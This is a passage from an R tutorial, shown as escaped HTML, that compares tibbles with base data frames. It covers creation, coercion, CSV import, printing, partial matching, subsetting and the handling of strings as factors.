&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;pre tabindex="0"&gt;&lt;code&gt;## # A tibble: 5 x 2
## a b
## &amp;lt;int&amp;gt; &amp;lt;chr&amp;gt;
## 1 1 a
## 2 2 b
## 3 3 c
## 4 4 d
## 5 5 e
&lt;/code&gt;&lt;/pre&gt;&lt;p&gt;A tibble using &lt;code&gt;tribble()&lt;/code&gt;.&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;tribble&lt;/span&gt;( &lt;span style="color:#ff7b72;font-weight:bold"&gt;~&lt;/span&gt;a, &lt;span style="color:#ff7b72;font-weight:bold"&gt;~&lt;/span&gt;b,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#8b949e;font-style:italic"&gt;#---|----&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#a5d6ff"&gt;1&lt;/span&gt;, &lt;span style="color:#a5d6ff"&gt;&amp;#34;a&amp;#34;&lt;/span&gt;,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#a5d6ff"&gt;2&lt;/span&gt;, &lt;span style="color:#a5d6ff"&gt;&amp;#34;b&amp;#34;&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;pre tabindex="0"&gt;&lt;code&gt;## # A tibble: 2 x 2
## a b
## &amp;lt;dbl&amp;gt; &amp;lt;chr&amp;gt;
## 1 1.00 a
## 2 2.00 b
&lt;/code&gt;&lt;/pre&gt;&lt;p&gt;Notice the odd one out? &lt;code&gt;tribble()&lt;/code&gt; is different. It’s a way of laying out small amounts of data in an easy-to-read form. I’m not too keen on these, as even writing out that simple 2 x 2 tribble got tedious.&lt;/p&gt;
&lt;h4 id="2-coercion"&gt;2) Coercion.&lt;/h4&gt;
&lt;p&gt;Just as &lt;code&gt;as.data.frame()&lt;/code&gt; coerces objects into data frames, &lt;code&gt;as_data_frame()&lt;/code&gt; and &lt;code&gt;as_tibble()&lt;/code&gt; coerce objects into tibbles.&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;df &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;data.frame&lt;/span&gt;(a &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;1&lt;/span&gt;&lt;span style="color:#ff7b72;font-weight:bold"&gt;:&lt;/span&gt;&lt;span style="color:#a5d6ff"&gt;5&lt;/span&gt;, b &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#79c0ff"&gt;letters&lt;/span&gt;[1&lt;span style="color:#ff7b72;font-weight:bold"&gt;:&lt;/span&gt;&lt;span style="color:#a5d6ff"&gt;5&lt;/span&gt;])
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;as_data_frame&lt;/span&gt;(df)
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;pre tabindex="0"&gt;&lt;code&gt;## # A tibble: 5 x 2
## a b
## &amp;lt;int&amp;gt; &amp;lt;fct&amp;gt;
## 1 1 a
## 2 2 b
## 3 3 c
## 4 4 d
## 5 5 e
&lt;/code&gt;&lt;/pre&gt;&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;as_tibble&lt;/span&gt;(df)
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;pre tabindex="0"&gt;&lt;code&gt;## # A tibble: 5 x 2
## a b
## &amp;lt;int&amp;gt; &amp;lt;fct&amp;gt;
## 1 1 a
## 2 2 b
## 3 3 c
## 4 4 d
## 5 5 e
&lt;/code&gt;&lt;/pre&gt;&lt;p&gt;You can coerce more than just data frames, too. Objects such as lists, matrices, vectors and single instances of a class are all convertible.&lt;/p&gt;
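&lt;p&gt;As a rough sketch of coercing other objects (the list, matrix and vector below are made up for illustration), &lt;code&gt;as_tibble()&lt;/code&gt; accepts a named list or a matrix with column names, while &lt;code&gt;enframe()&lt;/code&gt; turns a named vector into a two-column tibble.&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;library(&amp;#34;tibble&amp;#34;)

# A named list of equal-length vectors becomes one column per element.
lst = list(a = 1:3, b = letters[1:3])
tib_list = as_tibble(lst)

# A matrix with column names becomes one column per matrix column.
m = matrix(1:6, nrow = 3, dimnames = list(NULL, c(&amp;#34;x&amp;#34;, &amp;#34;y&amp;#34;)))
tib_mat = as_tibble(m)

# A named vector becomes a tibble with &amp;#34;name&amp;#34; and &amp;#34;value&amp;#34; columns.
tib_vec = enframe(c(first = 1, second = 2))
&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;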
&lt;h4 id="3-importing"&gt;3) Importing.&lt;/h4&gt;
&lt;p&gt;There are a few options to read in data files within the {tidyverse}, so we’ll just compare &lt;code&gt;read_csv()&lt;/code&gt; and its representative &lt;code&gt;data.frame()&lt;/code&gt; pal, &lt;code&gt;read.csv()&lt;/code&gt;. Let’s take a look at them. I have here an example data set that I’ve created in MS Excel. You can download/look at this data &lt;a href="https://gist.github.com/theoroe3/8bc989b644adc24117bc66f50c292fc8" rel="external"&gt;here&lt;/a&gt;. To get access to this function you’ll need the {readr} package. Again this is part of the {tidyverse} so either will do.&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;library&lt;/span&gt;(&lt;span style="color:#a5d6ff"&gt;&amp;#34;readr&amp;#34;&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;url &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;https://gist.githubusercontent.com/theoroe3/8bc989b644adc24117bc66f50c292fc8/raw/f677a2ad811a9854c9d174178b0585a87569af60/tibbles_data.csv&amp;#34;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;tib &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;read_csv&lt;/span&gt;(url)
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;pre tabindex="0"&gt;&lt;code&gt;## Parsed with column specification:
## cols(
## `&amp;lt;-` = col_integer(),
## `8` = col_integer(),
## `%` = col_double(),
## name = col_character()
## )
&lt;/code&gt;&lt;/pre&gt;&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;tib
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;pre tabindex="0"&gt;&lt;code&gt;## # A tibble: 4 x 4
## `&amp;lt;-` `8` `%` name
## &amp;lt;int&amp;gt; &amp;lt;int&amp;gt; &amp;lt;dbl&amp;gt; &amp;lt;chr&amp;gt;
## 1 1 2 0.250 t
## 2 2 4 0.250 h
## 3 3 6 0.250 e
## 4 4 8 0.250 o
&lt;/code&gt;&lt;/pre&gt;&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;df &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;read.csv&lt;/span&gt;(url)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;df
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;pre tabindex="0"&gt;&lt;code&gt;## X.. X8 X. name
## 1 1 2 0.25 t
## 2 2 4 0.25 h
## 3 3 6 0.25 e
## 4 4 8 0.25 o
&lt;/code&gt;&lt;/pre&gt;&lt;p&gt;Not only does &lt;code&gt;read_csv()&lt;/code&gt; return a pretty tibble, it is also much faster. For proof, check out &lt;a href="http://yetanothermathprogrammingconsultant.blogspot.co.uk/2016/12/reading-csv-files-in-r-readcsv-vs.html" rel="external"&gt;this article&lt;/a&gt; by Erwin Kalvelagen. The keen eyes amongst you will have noticed something odd about the variable names… we’ll get on to that soon.&lt;/p&gt;
&lt;h2 id="tibbles-vs-data-frames"&gt;Tibbles vs Data Frames&lt;/h2&gt;
&lt;p&gt;Did you notice a key difference in the &lt;code&gt;tibble()&lt;/code&gt;s and &lt;code&gt;data.frame()&lt;/code&gt;s above? Take a look again.&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;tibble&lt;/span&gt;(a &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;1&lt;/span&gt;&lt;span style="color:#ff7b72;font-weight:bold"&gt;:&lt;/span&gt;&lt;span style="color:#a5d6ff"&gt;26&lt;/span&gt;, b &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#79c0ff"&gt;letters&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;pre tabindex="0"&gt;&lt;code&gt;## # A tibble: 26 x 2
## a b
## &amp;lt;int&amp;gt; &amp;lt;chr&amp;gt;
## 1 1 a
## 2 2 b
## 3 3 c
## 4 4 d
## 5 5 e
## # ... with 21 more rows
&lt;/code&gt;&lt;/pre&gt;&lt;p&gt;The first thing you should notice is the pretty print process. The class of each column is now displayed above it and the dimensions of the tibble are shown at the top. The default print option within tibbles means they will only display 10 rows if the data frame has more than 20 rows (I’ve changed mine to display 5 rows). Neat. Alongside that, we now only view columns that will fit on the screen. This is already looking quite the part. The row settings can be changed via&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;options&lt;/span&gt;(tibble.print_max &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;3&lt;/span&gt;, tibble.print_min &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;1&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;So now if there are more than 3 rows, we print only 1 row. Tibbles with 3 and 4 rows would now print like so.&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;tibble&lt;/span&gt;(&lt;span style="color:#a5d6ff"&gt;1&lt;/span&gt;&lt;span style="color:#ff7b72;font-weight:bold"&gt;:&lt;/span&gt;&lt;span style="color:#a5d6ff"&gt;3&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;pre tabindex="0"&gt;&lt;code&gt;## # A tibble: 3 x 1
## `1:3`
## &amp;lt;int&amp;gt;
## 1 1
## 2 2
## 3 3
&lt;/code&gt;&lt;/pre&gt;&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;tibble&lt;/span&gt;(&lt;span style="color:#a5d6ff"&gt;1&lt;/span&gt;&lt;span style="color:#ff7b72;font-weight:bold"&gt;:&lt;/span&gt;&lt;span style="color:#a5d6ff"&gt;4&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;pre tabindex="0"&gt;&lt;code&gt;## # A tibble: 4 x 1
## `1:4`
## &amp;lt;int&amp;gt;
## 1 1
## # ... with 3 more rows
&lt;/code&gt;&lt;/pre&gt;&lt;p&gt;Yes, OK, you could do this with the traditional data frame. But it would be a lot more work, &lt;em&gt;right&lt;/em&gt;?&lt;/p&gt;
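&lt;p&gt;If you only want a different number of rows for a single call, rather than changing the global options, the &lt;code&gt;print()&lt;/code&gt; method for tibbles takes an &lt;code&gt;n&lt;/code&gt; argument. A minimal sketch, using a made-up tibble:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;library(&amp;#34;tibble&amp;#34;)

tib_letters = tibble(a = 1:26, b = letters)

# Show just the first 3 rows, for this call only.
print(tib_letters, n = 3)

# Show every row, however long the tibble is.
print(tib_letters, n = Inf)
&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;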
&lt;p&gt;As well as the fancy printing, tibbles don’t drop the variable type, don’t partial match and they allow non-syntactic column names when importing data. We’re going to use the data from before. Again, it is available &lt;a href="https://gist.github.com/theoroe3/8bc989b644adc24117bc66f50c292fc8" rel="external"&gt;here&lt;/a&gt;. Notice it has 3 non-syntactic column names and one column of characters. Reading this in as a tibble and a data frame we get&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;tib
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;pre tabindex="0"&gt;&lt;code&gt;## # A tibble: 4 x 4
## `&amp;lt;-` `8` `%` name
## &amp;lt;int&amp;gt; &amp;lt;int&amp;gt; &amp;lt;dbl&amp;gt; &amp;lt;chr&amp;gt;
## 1 1 2 0.250 t
## 2 2 4 0.250 h
## 3 3 6 0.250 e
## 4 4 8 0.250 o
&lt;/code&gt;&lt;/pre&gt;&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;df
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;pre tabindex="0"&gt;&lt;code&gt;## X.. X8 X. name
## 1 1 2 0.25 t
## 2 2 4 0.25 h
## 3 3 6 0.25 e
## 4 4 8 0.25 o
&lt;/code&gt;&lt;/pre&gt;&lt;p&gt;We see already that in the &lt;code&gt;read.csv()&lt;/code&gt; process we’ve lost the column names. Let’s try some partial matching…&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;tib&lt;span style="color:#ff7b72;font-weight:bold"&gt;$&lt;/span&gt;n
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;pre tabindex="0"&gt;&lt;code&gt;## Warning: Unknown or uninitialised column: &amp;#39;n&amp;#39;.
## NULL
&lt;/code&gt;&lt;/pre&gt;&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;df&lt;span style="color:#ff7b72;font-weight:bold"&gt;$&lt;/span&gt;n
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;pre tabindex="0"&gt;&lt;code&gt;## [1] t h e o
## Levels: e h o t
&lt;/code&gt;&lt;/pre&gt;&lt;p&gt;With the tibble we get a warning and &lt;code&gt;NULL&lt;/code&gt;, yet with the data frame it leads us straight to our &lt;code&gt;name&lt;/code&gt; variable. To read more about why partial matching is bad, check out &lt;a href="http://r.789695.n4.nabble.com/Deprecating-partial-matching-in-data-frame-td4661898.html" rel="external"&gt;this thread&lt;/a&gt;.&lt;/p&gt;
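&lt;p&gt;If you are stuck with a standard data frame, base R can at least warn when &lt;code&gt;$&lt;/code&gt; falls back on partial matching, via the &lt;code&gt;warnPartialMatchDollar&lt;/code&gt; option. A small sketch, using a made-up data frame rather than the csv file above:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;# Ask base R to warn whenever $ relies on partial matching.
old = options(warnPartialMatchDollar = TRUE)

df_names = data.frame(name = c(&amp;#34;t&amp;#34;, &amp;#34;h&amp;#34;, &amp;#34;e&amp;#34;, &amp;#34;o&amp;#34;))

# Still returns the name column, but now with a partial match warning.
df_names$n

# Restore the previous setting.
options(old)
&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;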
&lt;p&gt;What about subsetting? Let’s try it out using the data from our csv file.&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;tib[,&lt;span style="color:#a5d6ff"&gt;2&lt;/span&gt;]
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;pre tabindex="0"&gt;&lt;code&gt;## # A tibble: 4 x 1
## `8`
## &amp;lt;int&amp;gt;
## 1 2
## 2 4
## 3 6
## 4 8
&lt;/code&gt;&lt;/pre&gt;&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;tib[2]
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;pre tabindex="0"&gt;&lt;code&gt;## # A tibble: 4 x 1
## `8`
## &amp;lt;int&amp;gt;
## 1 2
## 2 4
## 3 6
## 4 8
&lt;/code&gt;&lt;/pre&gt;&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;df[,&lt;span style="color:#a5d6ff"&gt;2&lt;/span&gt;]
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;pre tabindex="0"&gt;&lt;code&gt;## [1] 2 4 6 8
&lt;/code&gt;&lt;/pre&gt;&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;df[2]
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;pre tabindex="0"&gt;&lt;code&gt;## X8
## 1 2
## 2 4
## 3 6
## 4 8
&lt;/code&gt;&lt;/pre&gt;&lt;p&gt;With a normal data frame, single square brackets give us a vector from &lt;code&gt;df[, 2]&lt;/code&gt; but a data frame from &lt;code&gt;df[2]&lt;/code&gt;. Using tibbles, single square brackets, &lt;code&gt;[&lt;/code&gt;, will always return another tibble. Much neater. Now for double brackets.&lt;/p&gt;
&lt;hr&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;tib[[1]]
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;pre tabindex="0"&gt;&lt;code&gt;## [1] 1 2 3 4
&lt;/code&gt;&lt;/pre&gt;&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;tib&lt;span style="color:#ff7b72;font-weight:bold"&gt;$&lt;/span&gt;name
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;pre tabindex="0"&gt;&lt;code&gt;## [1] &amp;#34;t&amp;#34; &amp;#34;h&amp;#34; &amp;#34;e&amp;#34; &amp;#34;o&amp;#34;
&lt;/code&gt;&lt;/pre&gt;&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;df[[1]]
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;pre tabindex="0"&gt;&lt;code&gt;## [1] 1 2 3 4
&lt;/code&gt;&lt;/pre&gt;&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;df&lt;span style="color:#ff7b72;font-weight:bold"&gt;$&lt;/span&gt;name
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;pre tabindex="0"&gt;&lt;code&gt;## [1] t h e o
## Levels: e h o t
&lt;/code&gt;&lt;/pre&gt;&lt;p&gt;Double square brackets, &lt;code&gt;[[&lt;/code&gt;, and the traditional dollar, &lt;code&gt;$&lt;/code&gt;, are ways to access individual columns as vectors. Now, with tibbles, we have separate operators for data frame operations and single column operations, so we don’t have to use that pesky &lt;code&gt;drop = FALSE&lt;/code&gt;. Note, these are actually quicker than the &lt;code&gt;[[&lt;/code&gt; and &lt;code&gt;$&lt;/code&gt; of the &lt;code&gt;data.frame()&lt;/code&gt;, as shown in the &lt;a href="https://cran.r-project.org/web/packages/tibble/tibble.pdf" rel="external"&gt;documentation for the tibble package&lt;/a&gt;.&lt;/p&gt;
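&lt;p&gt;To make the contrast concrete, here is a small sketch (with made-up data) of the different access patterns and what each one returns.&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;library(&amp;#34;tibble&amp;#34;)

df_small = data.frame(a = 1:3, b = 4:6)
tib_small = tibble(a = 1:3, b = 4:6)

# Data frame: a single column collapses to a vector unless drop = FALSE.
is.data.frame(df_small[, 2])                # FALSE
is.data.frame(df_small[, 2, drop = FALSE])  # TRUE

# Tibble: [ keeps the tibble, while [[ and $ pull out the vector.
is_tibble(tib_small[, 2])                   # TRUE
is.integer(tib_small[[2]])                  # TRUE
is.integer(tib_small$b)                     # TRUE
&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;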
&lt;hr&gt;
&lt;p&gt;At last, no more strings as factors! Upon reading the data in, tibbles recognise &lt;em&gt;strings as strings&lt;/em&gt;, not factors. For example, with the name column in our data set.&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;class&lt;/span&gt;(df&lt;span style="color:#ff7b72;font-weight:bold"&gt;$&lt;/span&gt;name)
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;pre tabindex="0"&gt;&lt;code&gt;## [1] &amp;#34;factor&amp;#34;
&lt;/code&gt;&lt;/pre&gt;&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;class&lt;/span&gt;(tib&lt;span style="color:#ff7b72;font-weight:bold"&gt;$&lt;/span&gt;name)
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;pre tabindex="0"&gt;&lt;code&gt;## [1] &amp;#34;character&amp;#34;
&lt;/code&gt;&lt;/pre&gt;&lt;p&gt;I quite like this: it’s much easier to turn a vector of characters into factors than vice versa, so why not give me everything as strings? Now I can choose whether or not to convert to factors.&lt;/p&gt;
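&lt;p&gt;When you do want a factor, the conversion is a one-liner. A minimal sketch with a made-up tibble:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;library(&amp;#34;tibble&amp;#34;)

tib_chr = tibble(name = c(&amp;#34;t&amp;#34;, &amp;#34;h&amp;#34;, &amp;#34;e&amp;#34;, &amp;#34;o&amp;#34;))
class(tib_chr$name)   # &amp;#34;character&amp;#34;

# Opt in to a factor only where it is actually wanted.
tib_chr$name = factor(tib_chr$name)
levels(tib_chr$name)  # &amp;#34;e&amp;#34; &amp;#34;h&amp;#34; &amp;#34;o&amp;#34; &amp;#34;t&amp;#34;
&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;Going the other way, &lt;code&gt;read.csv()&lt;/code&gt; accepts &lt;code&gt;stringsAsFactors = FALSE&lt;/code&gt; if you want strings kept as strings from the base reader.&lt;/p&gt;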
&lt;h2 id="disadvantages"&gt;Disadvantages&lt;/h2&gt;
